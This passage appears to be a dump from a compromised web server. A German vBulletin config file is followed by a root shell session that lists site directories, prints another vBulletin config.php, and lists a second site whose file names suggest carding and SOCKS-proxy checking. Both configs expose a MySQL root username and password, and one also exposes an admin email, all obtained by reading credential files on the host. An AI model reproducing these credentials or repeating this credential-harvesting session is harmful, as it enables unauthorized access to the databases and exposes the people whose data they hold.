|| #################################################################### ||
\*======================================================================*/
/*-------------------------------------------------------*\
| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* |
+---------------------------------------------------------+
| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten- |
| bank Fehler auftreten, muessen Sie Ihren Provider um |
| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die |
| Variablen in dieser Datei nicht nennen koennen. |
\*-------------------------------------------------------*/
// ****** DATENBANK: TYP ******
// Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank
// befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli.
// Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden.
// Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein.
$config['Database']['dbtype'] = 'mysql';
// ****** DATENBANK: NAME DER DATENBANK ******
// Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll.
// Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider.
$config['Database']['dbname'] = 'cccteam';
// ****** TABELLEN-PRAEFIX ******
// Praefix, das den Tabellennamen in der Datenbank vorangestellt wird.
// Zum Beispiel: $config['Database']['tableprefix'] = 'vb3_';
// Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei
// install/tableprefix.php hinzufuegen, aendern oder entfernen.
$config['Database']['tableprefix'] = '';
// ****** TECHNISCHE E-MAIL-ADRESSE ******
// Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung
// an diese Adresse geschickt.
// Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine
// E-Mails verschickt.
$config['Database']['technicalemail'] = 'dbmeister@beispiel.xy';
// ****** LEEREN SQL-MODUS ERZWINGEN ******
// In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin
// kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen
// deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert.
$config['Database']['force_sql_mode'] = false;
// ****** MASTER-DATENBANK: SERVERNAME UND PORT ******
// Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein.
// Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst
// mit dem Standardwerten.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;
// ****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ******
// Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff
// auf den MySQL-Server benoetigen.
// Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = 'QkZorIZZC5e';
// ****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ******
// Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen.
// Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht
// bei extrem grossen Foren.
// Wenn Sie nicht sicher sind, was Sie hier angeben sollen, lassen Sie die Einstellung
// auf aus.
// 0 = aus; 1 = an
$config['MasterServer']['usepconnect'] = 0;
// ****** SLAVE-DATENBANK: KONFIGURATION ******
// Wenn Sie zwei Datenbankserver verwenden, koennen Sie hier die Daten fuer den Slave-Server
// festlegen.
// Wenn Sie sich nicht 100% sicher sind, ob Sie hier etwas eintragen muessen, veraendern Sie die
// Standardeinstellungen nicht.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;
// ****** PFADE ZUM ADMINISTRATOR- UND MODERATOR-KONTROLLZENTRUM ******
// Hier koennen Sie fuer die Verzeichnisse, in denen sich die Dateien fuer das
// Administrator- und Moderator-Kontrollzentrum befinden, alternative Namen an-
// geben. Vielleicht moechten Sie dies aus Sicherheitsgruenden tun.
// Bitte beachten Sie, dass, wenn Sie die Namen hier aendern, Sie auch noch die
// Namen der Verzeichnisse auf dem Server aendern muessen.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';
// ****** COOKIE-PRAEFIX ******
// Praefix, das in allen vBulletin-Cookies enthalten ist.
// Halten Sie es kurz und verwenden Sie nur Zahlen und Buchstaben, d.h. 1-9 und a-Z
$config['Misc']['cookieprefix'] = 'bb';
// ****** VOLLSTAENDIGER PFAD ZUM VERZEICHNIS DES FORUMS ******
// Bei einigen Servern kann es noetig sein, den vollstaendigen Pfad zum Verzeichnis des Forums
// anzugeben, damit vBulletin ohne Probleme funktioniert. Sie muessen diese Einstellung nur
// aendern, wenn vBulletin Sie dazu auffordert.
// Hinweis: Verwenden Sie keinen abschliessenden Schraegstrich ('/') nach dem Verzeichnisnamen.
// Beispiel fuer Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Beispiel fuer Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';
// ****** COOKIE SICHERHEITS HASH ******
// Diese Option erlaubt die Cookies zu verschluesseln.
// Benutzbar sind dabei jegliche Zahlen und Buchstaben, d.h. 1-9 und a-Z.
// Diese Angabe kann leer gelassen werden um den Standard zu benutzen.
// Hinweis: Bei Aenderung werden alle Benutzer ausgeloggt.
$config['Misc']['cookie_security_hash'] = '';
// ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG SEHEN DUERFEN ******
// Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum das
// Kontrollzentrum-Log ansehen.
// Die Benutzer werden hier durch ihre User-ID angegeben. Um die User-ID heraus-
// zufinden, sehen Sie sich den Benutzer im Administrator-Kontrollzentrum an.
// Falls Sie diese Datei fuer eine Neuinstallation aendern, lassen Sie den Standard-
// wert stehen, da der erste Benutzer (Administrator) die User-ID 1 erhaelt.
// Trennen Sie mehrere User-IDs mit einem Komma voneinander.
// Beispiel 1: $config['SpecialUsers']['canviewadminlog'] = '1';
// Beispiel 2: $config['SpecialUsers']['canviewadminlog'] = '1,5,9';
$config['SpecialUsers']['canviewadminlog'] = '1';
// ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG LOESCHEN DUERFEN ******
// Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum
// Eintraege aus dem Kontrollzentrum-Log loeschen.
// Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
$config['SpecialUsers']['canpruneadminlog'] = '1';
// ****** BENUTZER, DIE QUERYS AUSFUEHREN DUERFEN ******
// Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum
// Querys (Datenbankabfragen) ausfuehren.
// Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
// Hinweis: Querys ausfuehren zu koennen, kann eine kritische Angelegenheit sein.
// Aus Sicherheitsgruenden sollten Sie in diese Liste keine User-IDs eintragen.
$config['SpecialUsers']['canrunqueries'] = '';
// ****** UNLOESCHBARE / UNVERAENDERBARE BENUTZER ******
// Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum
// von anderen Benutzern nicht geloescht oder bearbeitet werden.
// Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
$config['SpecialUsers']['undeletableusers'] = '';
// ****** SUPER-ADMINISTRATOREN ******
// Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum die
// Seite fuer die Administrator-Berechtigungen aufrufen und damit die Rechte
// anderer Administratoren bearbeiten.
// Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
$config['SpecialUsers']['superadministrators'] = '1';
// ****** DATASTORE-CACHE KONFIGURATION ******
// Hier koennen Sie die verschiedenen Methoden konfigurieren, die fuer den Cache
// der Datastore-Elemente verwendet werden.
// vB_Datastore_Filecache - um die Cache-Datei /includes/datastore/datastore_cache.php zu verwenden (CHMOD 777 benoetigt)
// vB_Datastore_APC - um APC zu verwenden
// vB_Datastore_XCache - um XCache zu verwenden
// vB_Datastore_eAccelerator - um eAccelerator zu verwenden
// vB_Datastore_Memcached - um einen Memcache-Server zu verwenden (Konfiguration weiter unten)
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
// ****** DATASTORE-PRAEFIX ******
// Wenn Sie einen PHP-Cache (APC, XCache, eAccelerator) verwenden und auf Ihrem
// Server mehr als ein Forum installiert ist, *kann* es sein, dass Sie hier
// ein Datastore-Praefix angeben muessen, damit die Foren nicht dieselbe
// Variable im Cache verwenden.
// Dies funktioniert aehnlich wie das Tabellen-Praefix fuer die Datenbank.
// $config['Datastore']['prefix'] = '';
// Bei einem Memcache-Server ist es auch notwendig, dass Sie den Hostnamen bzw.
// die IP-Adresse und den Port angeben, unter denen der Server erreichbar ist:
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// Erster Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/
// ********************************************************************************
// ****** Die folgenden Einstellungen werden nur in Spezialfaellen benoetigt ******
// ********************************************************************************
// ****** MySQLI-EINSTELLUNGEN ******
// Wenn Sie MySQL 4.1+ verwenden, sollte MySQLi fuer die Verbindung zur Datenbank
// verwendet werden.
// Wenn Ihre Datenbank einen anderen Zeichensatz als 'latin1' verwendet, koennen Sie
// hier den Standard-Zeichensatz fuer die Verbindung angeben.
// Wenn Sie nicht denselben Zeichensatz angeben, den Ihre Datenbank verwendet, kann
// es zu Fehlermeldungen dieser Art kommen:
// 'mysql error: Illegal mix of collations'
// Sie muessen diese Einstellung nur aendern, wenn Sie sicher wissen, dass dies noetig ist.
// $config['Mysqli']['charset'] = 'utf8';
// Zusaetzlich kann PHP angewiesen werden, die Verbindungs-Parameter aus der Datei
// auszulesen, die in 'ini_file' angegeben wurde. Bitte geben Sie den vollstaendigen
// Pfad zu dieser Datei an.
// Beispiel:
// $config['Mysqli']['ini_file'] = 'C:\Programme\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';
// Einstellungen fuer die Grafikverarbeitung
// Alle Grafiken, die groesser als die unten angegebenen Dimensionen sind, werden von
// vBulletin nicht verkleinert. Wenn auch groessere Grafiken verkleinert werden sollen,
// passen Sie diese Einstellungen an.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;
// GZIP komplett deaktivieren: Dies ist noetig, wenn auf dem Server standardmaessig
// GZIP aktiv ist und diese Option auch im Administrator-Kontrollzentrum aktiviert wurde.
// Dadurch ist oft in vBulletin keine Anmeldung mehr moeglich.
// Moeglicherweise ist es noetig, die folgende Zeile in der Datei /includes/init.php oder
// /includes/class_core.php aufzunehmen, damit dieser Eintrag wirksam wird.
//define('NOZIP', 1);
// Plug-in-System komplett deaktivieren: Dies ist noetig, wenn durch
// fehlerhafte Plug-ins in vBulletin keine Anmeldung mehr moeglich ist.
//define('DISABLE_HOOKS', 1);
// Keine E-Mails verschicken. Diese Einstellung sollte fuer ein Test-Forum aktiviert werden.
//define('DISABLE_MAIL', true);
// Debug-Modus aktivieren: Nur fuer Entwickler gedacht.
//if (VB_AREA == 'AdminCP')
//{
// $config['Misc']['debug'] = 1;
//}
/*======================================================================*\
|| ####################################################################
|| # CVS: $RCSfile$ - $Revision: 1035 $ 28757
|| ####################################################################
\*======================================================================*/
// Ja, es ist richtig, dass am Ende dieser Datei kein schliessendes PHP-Tag steht!
// Dadurch wird ein haeufig auftretender Fehler vermieden.
# cd /var/www/scenecms.org/ && ls -la
total 32
drwxrwxrwx 4 root root 4096 Oct 1 09:18 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
drwxr-xr-x 3 root root 4096 Oct 1 09:18 ba
-rw-r--r-- 1 root root 35 Mar 15 2010 index.php
-rw-r--r-- 1 root root 9962 May 10 2010 oldDATA.tgz
drwxrwxrwx 3 root root 4096 Jul 8 2010 web
# cd web && ls -la
total 12
drwxrwxrwx 3 root root 4096 Jul 8 2010 .
drwxrwxrwx 4 root root 4096 Oct 1 09:18 ..
drwxr-xr-x 16 root root 4096 Oct 2 15:14 board
# cd board/ && ls -la
total 2272
drwxr-xr-x 16 root root 4096 Oct 2 15:14 .
drwxrwxrwx 3 root root 4096 Jul 8 2010 ..
-rw-r--r-- 1 root root 17097 Apr 23 2010 LICENSE
drwxr-xr-x 3 root root 4096 Oct 2 15:31 admincp
-rw-r--r-- 1 root root 38048 Apr 23 2010 ajax.php
-rw-r--r-- 1 root root 75538 Apr 23 2010 album.php
-rw-r--r-- 1 root root 19054 Apr 23 2010 announcement.php
drwxr-xr-x 2 root root 4096 Jul 8 2010 archive
-rw-r--r-- 1 root root 8945 Apr 23 2010 asset.php
-rw-r--r-- 1 root root 20246 Apr 23 2010 assetmanage.php
-rw-r--r-- 1 root root 15723 Apr 23 2010 attachment.php
-rw-r--r-- 1 root root 6119 Apr 23 2010 attachment_inlinemod.php
-rw-r--r-- 1 root root 3462 Apr 23 2010 blog_attachment.php
-rw-r--r-- 1 root root 96014 Apr 23 2010 calendar.php
-rw-r--r-- 1 root root 43 Apr 23 2010 clear.gif
drwxr-xr-x 7 root root 4096 Jul 8 2010 clientscript
-rw-r--r-- 1 root root 15283 Apr 23 2010 converse.php
drwxr-xr-x 7 root root 4096 Jul 8 2010 cpstyles
-rw-r--r-- 1 root root 3244 Apr 23 2010 cron.php
-rw-r--r-- 1 root root 4051 Apr 23 2010 css.php
drwxr-xr-x 3 root root 4096 Jul 8 2010 customavatars
drwxr-xr-x 3 root root 4096 Jul 8 2010 customgroupicons
drwxr-xr-x 2 root root 4096 Jul 8 2010 customprofilepics
-rw-r--r-- 1 root root 1660 Apr 23 2010 editor.php
-rw-r--r-- 1 root root 46327 Apr 23 2010 editpost.php
-rw-r--r-- 1 root root 1336 Apr 23 2010 entry.php
-rw-r--r-- 1 root root 29278 Apr 23 2010 external.php
-rw-r--r-- 1 root root 9901 Apr 23 2010 faq.php
-rw-r--r-- 1 root root 10134 Apr 23 2010 favicon.ico
-rw-r--r-- 1 root root 22502 Apr 23 2010 forum.php
-rw-r--r-- 1 root root 42428 Apr 23 2010 forumdisplay.php
-rw-r--r-- 1 root root 2001 Apr 23 2010 global.php
-rw-r--r-- 1 root root 155709 Apr 23 2010 group.php
-rw-r--r-- 1 root root 26085 Apr 23 2010 group_inlinemod.php
-rw-r--r-- 1 root root 11483 Apr 23 2010 groupsubscription.php
-rw-r--r-- 1 root root 8974 Apr 23 2010 image.php
drwxr-xr-x 24 root root 4096 Oct 2 16:42 images
drwxr-xr-x 8 root root 12288 Oct 2 15:27 includes
-rw-r--r-- 1 root root 2335 Apr 23 2010 index.php
-rw-r--r-- 1 root root 46944 Apr 23 2010 infraction.php
-rw-r--r-- 1 root root 186868 Apr 23 2010 inlinemod.php
drwxr-xr-x 3 root root 4096 Oct 2 15:09 install
-rw-r--r-- 1 root root 11280 Apr 23 2010 joinrequests.php
-rw-r--r-- 1 root root 1656 Apr 23 2010 list.php
-rw-r--r-- 1 root root 10749 Apr 23 2010 login.php
-rw-r--r-- 1 root root 18893 Apr 23 2010 member.php
-rw-r--r-- 1 root root 16327 Apr 23 2010 member_inlinemod.php
-rw-r--r-- 1 root root 40280 Apr 23 2010 memberlist.php
-rw-r--r-- 1 root root 22247 Apr 23 2010 misc.php
drwxr-xr-x 2 root root 4096 Jul 8 2010 modcp
-rw-r--r-- 1 root root 75687 Apr 23 2010 moderation.php
-rw-r--r-- 1 root root 6714 Apr 23 2010 moderator.php
-rw-r--r-- 1 root root 17286 Apr 23 2010 newattachment.php
-rw-r--r-- 1 root root 38921 Apr 23 2010 newreply.php
-rw-r--r-- 1 root root 19610 Apr 23 2010 newthread.php
-rw-r--r-- 1 root root 21719 Apr 23 2010 online.php
drwxr-xr-x 5 root root 4096 Jul 8 2010 packages
-rw-r--r-- 1 root root 8031 Apr 23 2010 payment_gateway.php
-rw-r--r-- 1 root root 13196 Apr 23 2010 payments.php
-rw-r--r-- 1 root root 3997 Apr 23 2010 picture.php
-rw-r--r-- 1 root root 16600 Apr 23 2010 picture_inlinemod.php
-rw-r--r-- 1 root root 26104 Apr 23 2010 picturecomment.php
-rw-r--r-- 1 root root 29273 Apr 23 2010 poll.php
-rw-r--r-- 1 root root 10349 Apr 23 2010 posthistory.php
-rw-r--r-- 1 root root 76416 Apr 23 2010 postings.php
-rw-r--r-- 1 root root 7022 Apr 23 2010 printthread.php
-rw-r--r-- 1 root root 78993 Apr 23 2010 private.php
-rw-r--r-- 1 root root 160820 Apr 23 2010 profile.php
-rw-r--r-- 1 root root 296 Apr 23 2010 receiver.php
-rw-r--r-- 1 root root 54170 Apr 23 2010 register.php
-rw-r--r-- 1 root root 5742 Apr 23 2010 report.php
-rw-r--r-- 1 root root 14700 Apr 23 2010 reputation.php
-rw-r--r-- 1 root root 34065 Apr 23 2010 search.php
-rw-r--r-- 1 root root 22645 Apr 23 2010 sendmessage.php
-rw-r--r-- 1 root root 12420 Apr 23 2010 showgroups.php
-rw-r--r-- 1 root root 12673 Apr 23 2010 showpost.php
-rw-r--r-- 1 root root 79415 Apr 23 2010 showthread.php
drwxr-xr-x 2 root root 4096 Jul 8 2010 signaturepics
-rw-r--r-- 1 root root 37650 Apr 23 2010 subscription.php
-rw-r--r-- 1 root root 5334 Apr 23 2010 tags.php
-rw-r--r-- 1 root root 8735 Apr 23 2010 threadrate.php
-rw-r--r-- 1 root root 11081 Apr 23 2010 threadtag.php
-rw-r--r-- 1 root root 61 Apr 23 2010 uploadprogress.gif
-rw-r--r-- 1 root root 39049 Apr 23 2010 usercp.php
-rw-r--r-- 1 root root 20969 Apr 23 2010 usernote.php
drwxr-xr-x 12 root root 4096 Jul 8 2010 vb
-rw-r--r-- 1 root root 27814 Apr 23 2010 visitormessage.php
-rw-r--r-- 1 root root 1660 Apr 23 2010 widget.php
-rw-r--r-- 1 root root 3656 Apr 23 2010 xmlsitemap.php
# cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.3 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/
// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';
// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = 'forum';
// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';
// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'admin@scenecms.org';
// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;
// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;
// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = 'QkZorIZZC5e';
// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;
// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;
// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';
// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';
// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '/var/www/scenecms.org/web/board';
// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';
// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';
// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';
// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';
// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1';
// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';
// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/
// ****** The following options are only needed in special cases ******
// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';
// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';
// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;
/*======================================================================*\
|| ####################################################################
|| #
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/
# cd /var/www/vpn24.org/ && ls -la
total 120
drwxr-xr-x 3 root root 4096 Dec 13 22:18 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
-rw-r--r-- 1 root root 35 May 9 2010 index.php
-rwxr-xr-x 1 root root 18378 Nov 8 19:00 testVicSocks
drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 web
# cd web
# ls -la | grep -v cookie.txt
total 3296
drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 .
drwxr-xr-x 3 root root 4096 Dec 13 22:18 ..
-rw-r--r-- 1 www-data www-data 6413 Dec 11 07:33 21Kms__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Jan 3 18:07 5Liter__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 4 17:35 AtzePeng__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 1 10:29 BloodySunday__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 17 12:39 Delphinko__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 15 18:47 DieFliege__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 28 19:38 DingDong__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 15 13:59 Emrano__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 8 20:14 EsseX__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 6 20:22 Firewall__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 20 11:18 HohesC__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 23 14:28 ICHICH__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 11 17:53 Janitor1__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 27 14:04 KaLLi__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 5 12:17 Keineloe__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 10 17:26 Lognot__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 3 20:11 Maxim__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:35 MysticSun__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 27 08:53 QuickSilver__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 24 01:01 Selfcut__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 19 20:52 SlamD__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 18 14:05 Sparkasse__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:19 TheKing__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Jan 1 22:54 Tiberius1__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 23 15:04 WeArEoNe__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:02 __splittingError.htm
-rw-r--r-- 1 www-data root 257 Nov 18 20:01 abo.php
-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_lu.php
-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_ru.php
-rw-r--r-- 1 www-data root 4508 Nov 18 20:43 account.php
-rw-r--r-- 1 www-data www-data 6412 Nov 14 07:33 analytics__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 18 12:36 andreas7411__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 16 11:40 asdfghjkl__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 9 10:37 b0uNz__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 15 17:38 b14ckf1ag__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 2 02:09 b2323__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 11 13:43 b7233__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 11 19:37 bLackftw1989__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 9 13:49 becks__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 12 15:42 beware__splittingError.htm
-rw-r--r-- 1 www-data root 1209 Jan 26 2010 buy.php
-rw-r--r-- 1 www-data www-data 6412 Dec 6 13:12 c4sh1__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 8 18:10 cardercarder__splittingError.htm
drwxrwxrwx 3 www-data root 36864 Jan 7 18:38 cashIn
-rw-r--r-- 1 www-data root 393 Nov 18 20:29 cashin.php
-rw-r--r-- 1 root root 1291 Nov 18 19:05 check_one_vsocks5123213.php
-rw-r--r-- 1 root root 2219 Nov 12 00:15 checkvsocks.php
-rw-r--r-- 1 www-data www-data 6412 Nov 11 22:01 crack__splittingError.htm
